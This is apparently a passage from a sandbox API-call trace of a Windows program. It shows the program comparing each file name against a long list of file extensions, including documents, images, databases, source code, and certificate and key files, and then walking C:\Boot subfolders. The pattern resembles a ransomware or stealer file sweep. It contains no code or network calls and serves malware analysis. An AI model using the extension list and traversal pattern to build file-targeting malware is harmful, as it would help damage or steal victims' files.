lstrlenW (lpString=".clx") returned 4 [0285.303] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0285.303] lstrlenW (lpString=".config") returned 7 [0285.303] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0285.303] lstrlenW (lpString=".cpp") returned 4 [0285.303] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0285.303] lstrlenW (lpString=".cr2") returned 4 [0285.303] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0285.303] lstrlenW (lpString=".crt") returned 4 [0285.303] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0285.303] lstrlenW (lpString=".crw") returned 4 [0285.303] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0285.303] lstrlenW (lpString=".cs") returned 3 [0285.303] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0285.303] lstrlenW (lpString=".css") returned 4 [0285.303] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0285.303] lstrlenW (lpString=".csv") returned 4 [0285.303] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0285.303] lstrlenW (lpString=".cub") returned 4 [0285.304] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0285.304] lstrlenW (lpString=".dae") returned 4 [0285.304] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0285.304] lstrlenW (lpString=".dat") returned 4 [0285.304] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0285.304] lstrlenW (lpString=".db") returned 3 [0285.304] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0285.304] lstrlenW (lpString=".dbf") returned 4 [0285.304] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.304] lstrlenW (lpString=".dbx") returned 4 [0285.304] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0285.304] lstrlenW (lpString=".dc3") returned 4 [0285.304] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0285.304] lstrlenW (lpString=".dcm") returned 4 [0285.304] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0285.304] lstrlenW (lpString=".dcr") returned 4 [0285.304] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0285.304] lstrlenW (lpString=".der") returned 4 [0285.304] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0285.304] lstrlenW (lpString=".dib") returned 4 [0285.304] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0285.304] lstrlenW (lpString=".dic") returned 4 [0285.304] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0285.304] lstrlenW (lpString=".dif") returned 4 [0285.304] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0285.304] lstrlenW (lpString=".divx") returned 5 [0285.304] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0285.305] lstrlenW (lpString=".djvu") returned 5 [0285.305] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0285.305] lstrlenW (lpString=".dng") returned 4 [0285.305] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0285.305] lstrlenW (lpString=".doc") returned 4 [0285.305] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.305] lstrlenW (lpString=".docm") returned 5 [0285.305] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0285.305] lstrlenW (lpString=".docx") returned 5 [0285.305] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.305] lstrlenW (lpString=".dot") returned 4 [0285.305] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0285.305] lstrlenW (lpString=".dotm") returned 5 [0285.305] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0285.305] lstrlenW (lpString=".dotx") returned 5 [0285.305] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0285.305] lstrlenW (lpString=".dpx") returned 4 [0285.305] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0285.305] lstrlenW (lpString=".dqy") returned 4 [0285.305] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0285.305] lstrlenW (lpString=".dsn") returned 4 [0285.305] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0285.305] lstrlenW (lpString=".dt") returned 3 [0285.305] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0285.305] lstrlenW (lpString=".dtd") returned 4 [0285.305] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0285.306] lstrlenW (lpString=".dwg") returned 4 [0285.306] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0285.306] lstrlenW (lpString=".dwt") returned 4 [0285.306] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0285.306] lstrlenW (lpString=".dx") returned 3 [0285.306] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0285.306] lstrlenW (lpString=".dxf") returned 4 [0285.306] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0285.306] lstrlenW (lpString=".edml") returned 5 [0285.306] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0285.306] lstrlenW (lpString=".efd") returned 4 [0285.306] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0285.306] lstrlenW (lpString=".elf") returned 4 [0285.306] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0285.306] lstrlenW (lpString=".emf") returned 4 [0285.306] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0285.306] lstrlenW (lpString=".emz") returned 4 [0285.306] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0285.307] lstrlenW (lpString=".epf") returned 4 [0285.307] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0285.307] lstrlenW (lpString=".eps") returned 4 [0285.307] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0285.307] lstrlenW (lpString=".epsf") returned 5 [0285.307] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0285.307] lstrlenW (lpString=".epsp") returned 5 [0285.307] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0285.307] lstrlenW (lpString=".erf") returned 4 [0285.307] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0285.307] lstrlenW (lpString=".exr") returned 4 [0285.307] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0285.307] lstrlenW (lpString=".f4v") returned 4 [0285.307] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0285.307] lstrlenW (lpString=".fido") returned 5 [0285.307] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0285.307] lstrlenW (lpString=".flm") returned 4 [0285.307] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0285.307] lstrlenW (lpString=".flv") returned 4 [0285.307] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0285.308] lstrlenW (lpString=".frm") returned 4 [0285.308] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0285.308] lstrlenW (lpString=".fxg") returned 4 [0285.308] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0285.308] lstrlenW (lpString=".geo") returned 4 [0285.308] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0285.308] lstrlenW (lpString=".gif") returned 4 [0285.308] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0285.308] lstrlenW (lpString=".grs") returned 4 [0285.308] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0285.308] lstrlenW (lpString=".gz") returned 3 [0285.308] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0285.308] lstrlenW (lpString=".h") returned 2 [0285.308] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0285.308] lstrlenW (lpString=".hdr") returned 4 [0285.308] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0285.308] lstrlenW (lpString=".hpp") returned 4 [0285.308] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0285.308] lstrlenW (lpString=".hta") returned 4 [0285.308] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0285.308] lstrlenW (lpString=".htc") returned 4 [0285.308] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0285.309] lstrlenW (lpString=".htm") returned 4 [0285.309] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0285.309] lstrlenW (lpString=".html") returned 5 [0285.309] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0285.309] lstrlenW (lpString=".icb") returned 4 [0285.309] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0285.309] lstrlenW (lpString=".ics") returned 4 [0285.309] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0285.309] lstrlenW (lpString=".iff") returned 4 [0285.309] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0285.309] lstrlenW (lpString=".inc") returned 4 [0285.309] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0285.309] lstrlenW (lpString=".indd") returned 5 [0285.309] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0285.309] lstrlenW (lpString=".ini") returned 4 [0285.309] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0285.309] lstrlenW (lpString=".iqy") returned 4 [0285.309] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0285.309] lstrlenW (lpString=".j2c") returned 4 [0285.309] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0285.310] lstrlenW (lpString=".j2k") returned 4 [0285.310] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0285.310] lstrlenW (lpString=".java") returned 5 [0285.310] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0285.310] lstrlenW (lpString=".jp2") returned 4 [0285.310] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0285.310] lstrlenW (lpString=".jpc") returned 4 [0285.310] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0285.310] lstrlenW (lpString=".jpe") returned 4 [0285.310] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0285.310] lstrlenW (lpString=".jpeg") returned 5 [0285.310] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0285.310] lstrlenW (lpString=".jpf") returned 4 [0285.310] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0285.310] lstrlenW (lpString=".jpg") returned 4 [0285.310] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.310] lstrlenW (lpString=".jpx") returned 4 [0285.310] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0285.310] lstrlenW (lpString=".js") returned 3 [0285.310] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0285.310] lstrlenW (lpString=".jsf") returned 4 [0285.310] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0285.310] lstrlenW (lpString=".json") returned 5 [0285.310] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0285.310] lstrlenW (lpString=".jsp") returned 4 [0285.310] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0285.310] lstrlenW (lpString=".kdc") returned 4 [0285.310] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0285.311] lstrlenW (lpString=".kmz") returned 4 [0285.311] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0285.311] lstrlenW (lpString=".kwm") returned 4 [0285.311] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0285.311] lstrlenW (lpString=".lasso") returned 6 [0285.311] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0285.311] lstrlenW (lpString=".lbi") returned 4 [0285.311] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0285.311] lstrlenW (lpString=".lgf") returned 4 [0285.311] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0285.311] lstrlenW (lpString=".lgp") returned 4 [0285.311] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0285.311] lstrlenW (lpString=".log") returned 4 [0285.311] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0285.311] lstrlenW (lpString=".m1v") returned 4 [0285.311] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0285.311] lstrlenW (lpString=".m4a") returned 4 [0285.311] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0285.311] lstrlenW (lpString=".m4v") returned 4 [0285.311] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0285.311] lstrlenW (lpString=".max") returned 4 [0285.311] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0285.311] lstrlenW (lpString=".md") returned 3 [0285.311] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0285.311] lstrlenW (lpString=".mda") returned 4 [0285.311] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0285.311] lstrlenW (lpString=".mdb") returned 4 [0285.311] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0285.312] lstrlenW (lpString=".mde") returned 4 [0285.312] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0285.312] lstrlenW (lpString=".mdf") returned 4 [0285.312] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0285.312] lstrlenW (lpString=".mdw") returned 4 [0285.312] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0285.312] lstrlenW (lpString=".mef") returned 4 [0285.312] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0285.312] lstrlenW (lpString=".mft") returned 4 [0285.312] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0285.312] lstrlenW (lpString=".mfw") returned 4 [0285.312] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0285.312] lstrlenW (lpString=".mht") returned 4 [0285.312] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0285.312] lstrlenW (lpString=".mhtml") returned 6 [0285.312] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0285.312] lstrlenW (lpString=".mka") returned 4 [0285.312] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0285.312] lstrlenW (lpString=".mkidx") returned 6 [0285.312] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0285.312] lstrlenW (lpString=".mkv") returned 4 [0285.312] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0285.312] lstrlenW (lpString=".mos") returned 4 [0285.312] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0285.312] lstrlenW (lpString=".mov") returned 4 [0285.312] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0285.312] lstrlenW (lpString=".mp3") returned 4 [0285.312] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0285.312] lstrlenW (lpString=".mp4") returned 4 [0285.313] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0285.313] lstrlenW (lpString=".mpeg") returned 5 [0285.313] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0285.313] lstrlenW (lpString=".mpg") returned 4 [0285.313] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0285.313] lstrlenW (lpString=".mpv") returned 4 [0285.313] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0285.313] lstrlenW (lpString=".mrw") returned 4 [0285.313] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0285.313] lstrlenW (lpString=".msg") returned 4 [0285.313] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0285.313] lstrlenW (lpString=".mxl") returned 4 [0285.313] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0285.313] lstrlenW (lpString=".myd") returned 4 [0285.313] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0285.313] lstrlenW (lpString=".myi") returned 4 [0285.313] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0285.313] lstrlenW (lpString=".nef") returned 4 [0285.313] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0285.313] lstrlenW (lpString=".nrw") returned 4 [0285.313] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0285.313] lstrlenW (lpString=".obj") returned 4 [0285.313] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0285.313] lstrlenW (lpString=".odb") returned 4 [0285.313] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0285.313] lstrlenW (lpString=".odc") returned 4 [0285.313] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0285.313] lstrlenW (lpString=".odm") returned 4 [0285.314] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0285.314] lstrlenW (lpString=".odp") returned 4 [0285.314] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0285.314] lstrlenW (lpString=".ods") returned 4 [0285.314] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0285.314] lstrlenW (lpString=".oft") returned 4 [0285.314] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0285.314] lstrlenW (lpString=".one") returned 4 [0285.314] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0285.314] lstrlenW (lpString=".onepkg") returned 7 [0285.314] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0285.314] lstrlenW (lpString=".onetoc2") returned 8 [0285.314] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0285.314] lstrlenW (lpString=".opt") returned 4 [0285.314] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0285.314] lstrlenW (lpString=".oqy") returned 4 [0285.314] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0285.314] lstrlenW (lpString=".orf") returned 4 [0285.314] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0285.314] lstrlenW (lpString=".p12") returned 4 [0285.314] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0285.314] lstrlenW (lpString=".p7b") returned 4 [0285.314] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0285.314] lstrlenW (lpString=".p7c") returned 4 [0285.314] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0285.314] lstrlenW (lpString=".pam") returned 4 [0285.314] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0285.314] lstrlenW (lpString=".pbm") returned 4 [0285.314] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0285.315] lstrlenW (lpString=".pct") returned 4 [0285.315] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0285.315] lstrlenW (lpString=".pcx") returned 4 [0285.315] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0285.315] lstrlenW (lpString=".pdd") returned 4 [0285.315] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0285.315] lstrlenW (lpString=".pdf") returned 4 [0285.315] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.315] lstrlenW (lpString=".pdp") returned 4 [0285.315] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0285.315] lstrlenW (lpString=".pef") returned 4 [0285.315] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0285.315] lstrlenW (lpString=".pem") returned 4 [0285.315] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0285.315] lstrlenW (lpString=".pff") returned 4 [0285.315] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0285.315] lstrlenW (lpString=".pfm") returned 4 [0285.315] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0285.315] lstrlenW (lpString=".pfx") returned 4 [0285.315] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0285.315] lstrlenW (lpString=".pgm") returned 4 [0285.315] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0285.315] lstrlenW (lpString=".php") returned 4 [0285.315] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0285.315] lstrlenW (lpString=".php3") returned 5 [0285.315] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0285.315] lstrlenW (lpString=".php4") returned 5 [0285.315] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0285.316] lstrlenW (lpString=".php5") returned 5 [0285.316] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0285.316] lstrlenW (lpString=".phtml") returned 6 [0285.316] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0285.316] lstrlenW (lpString=".pict") returned 5 [0285.316] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0285.316] lstrlenW (lpString=".pl") returned 3 [0285.316] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0285.316] lstrlenW (lpString=".pls") returned 4 [0285.316] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0285.316] lstrlenW (lpString=".pm") returned 3 [0285.316] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0285.316] lstrlenW (lpString=".png") returned 4 [0285.316] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0285.316] lstrlenW (lpString=".pnm") returned 4 [0285.316] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0285.316] lstrlenW (lpString=".pot") returned 4 [0285.316] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0285.316] lstrlenW (lpString=".potm") returned 5 [0285.316] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0285.316] lstrlenW (lpString=".potx") returned 5 [0285.316] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0285.316] lstrlenW (lpString=".ppa") returned 4 [0285.316] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0285.316] lstrlenW (lpString=".ppam") returned 5 [0285.316] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0285.316] lstrlenW (lpString=".ppm") returned 4 [0285.316] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0285.317] lstrlenW (lpString=".pps") returned 4 [0285.317] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0285.317] lstrlenW (lpString=".ppsm") returned 5 [0285.317] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0285.317] lstrlenW (lpString=".ppt") returned 4 [0285.317] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.317] lstrlenW (lpString=".pptm") returned 5 [0285.317] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0285.317] lstrlenW (lpString=".pptx") returned 5 [0285.317] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0285.317] lstrlenW (lpString=".prn") returned 4 [0285.317] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0285.317] lstrlenW (lpString=".ps") returned 3 [0285.317] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0285.317] lstrlenW (lpString=".psb") returned 4 [0285.317] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0285.317] lstrlenW (lpString=".psd") returned 4 [0285.317] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0285.317] lstrlenW (lpString=".pst") returned 4 [0285.317] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0285.459] lstrlenW (lpString=".ptx") returned 4 [0285.460] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0285.460] lstrlenW (lpString=".pub") returned 4 [0285.460] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0285.460] lstrlenW (lpString=".pwm") returned 4 [0285.460] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0285.460] lstrlenW (lpString=".pxr") returned 4 [0285.460] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0285.460] lstrlenW (lpString=".py") returned 3 [0285.460] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0285.460] lstrlenW (lpString=".qt") returned 3 [0285.460] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0285.460] lstrlenW (lpString=".r3d") returned 4 [0285.460] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0285.460] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6d7e9a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.460] FindNextFileW (in: hFindFile=0x39481a8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6d7e9a, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.460] FindClose (in: hFindFile=0x39481a8 | out: hFindFile=0x39481a8) returned 1 [0285.461] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0285.461] FindNextFileW (in: hFindFile=0x3947be8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0285.461] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0285.461] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3947ea8 [0285.461] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0207675, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x518ea25e, ftLastWriteTime.dwHighDateTime=0x1d3271b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0285.461] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xf958, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0285.461] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x518ea25e, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe31db522, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xa558, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.462] FindNextFileW (in: hFindFile=0x3947ea8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc498516b, 